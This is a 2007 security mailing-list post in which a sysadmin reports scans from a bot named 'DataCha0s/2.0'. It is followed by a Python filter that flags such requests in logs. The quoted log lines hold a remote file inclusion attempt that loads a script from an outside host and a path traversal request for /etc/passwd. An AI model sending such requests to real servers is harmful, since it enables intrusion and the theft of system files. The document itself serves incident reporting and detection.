[Dshield] DataCha0s/2.0?

Ryan McConigley ryan at csse.uwa.edu.au
Thu Apr 26 00:41:27 GMT 2007


	Hi, I'm just curious, but has anyone else noticed a sudden rush of attempted web exploits from a script/bot that identifies itself as DataCha0s/2.0?

	Typical logs look like:

access_log:209.172.57.186 - - [25/Apr/2007:07:27:00 +0800] "GET /webcalendar//tools/send_reminders.php?includedir=http://www.whenweb.org/modules/TotalCalendar/cache/sool25.gif? HTTP/1.0" 301 430 "-" "DataCha0s/2.0"

access_log:133.3.8.135 - - [23/Apr/2007:11:14:21 +0800] "GET /bobh/gallery/view_photo.php?set_albumName=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd? HTTP/1.0" 302 - "-" "DataCha0s/2.0"

	The IP addresses resolve back to machines all over the place - Germany, US, Japan and New Zealand.  Looking back over my logs I've had a few before which seem to be scripted scans for generic vulnerabilities, such as the password file or webcalendar exploits, but the most recent ones have been "customised" for specific URLs on our web server, which is a trend I haven't seen before.

	Cheers, 
		Ryan.
--
          Ryan McConigley - Systems Administrator                  _.-,
     Computer Science   University of Western Australia        .--'  '-._
       Tel: (+61 8) 6488 7082 - Fax: (+61 8) 6488 1089       _/`-  _      '.
Ryan[@]csse.uwa.edu.au - http://www.csse.uwa.edu.au/~ryan  '----'._`.----. \
                                                                     `     \;
 "You're just jealous because the voices are talking to me"                ;_\




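The two request shapes in the log excerpts above (a parameter whose value is a remote URL, and a parameter that walks up the directory tree) can be flagged with a short log filter. This is an added example, not part of the original post; the sample lines, addresses, host names and finding labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Apache combined log format, with the optional "access_log:" style prefix
# that grep adds when it searches several files (IPv4 client addresses assumed).
LINE_RE = re.compile(
    r'^(?:[^\s:]+:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
SCANNER_AGENT = "DataCha0s"                       # user agent named in the post
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.I)
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')

def classify(line):
    """Return (client_ip, findings) for one log line, or None if unparseable."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    findings = []
    if SCANNER_AGENT in m['agent']:
        findings.append('scanner-user-agent')
    path, _, query = m['target'].partition('?')
    # parse_qsl percent-decodes once, so ..%2F is seen as ../
    values = [v for _k, v in parse_qsl(query, keep_blank_values=True)]
    if any(REMOTE_URL_RE.match(v) for v in values):
        findings.append('remote-url-parameter')
    if TRAVERSAL_RE.search(unquote(path)) or any(TRAVERSAL_RE.search(v) for v in values):
        findings.append('path-traversal')
    return m['ip'], findings

def scan(lines):
    """Keep only the parseable lines that raised at least one finding."""
    results = (classify(l) for l in lines)
    return [r for r in results if r and r[1]]

# Constructed sample lines (documentation address ranges, example hosts).
SAMPLE = [
    'access_log:192.0.2.10 - - [25/Apr/2007:07:27:00 +0800] "GET /webcalendar//tools/'
    'send_reminders.php?includedir=http://files.example.org/cache/x.gif? HTTP/1.0" '
    '301 430 "-" "DataCha0s/2.0"',
    'access_log:198.51.100.7 - - [23/Apr/2007:11:14:21 +0800] "GET /gallery/'
    'view_photo.php?set_albumName=..%2F..%2F..%2Fetc/passwd? HTTP/1.0" '
    '302 - "-" "DataCha0s/2.0"',
    '203.0.113.5 - - [25/Apr/2007:08:00:00 +0800] "GET /index.html HTTP/1.1" '
    '200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, findings in scan(SAMPLE):
        print(ip, ", ".join(findings))
```

Matching on request shape as well as user agent keeps the filter useful when the same requests arrive with a different agent string.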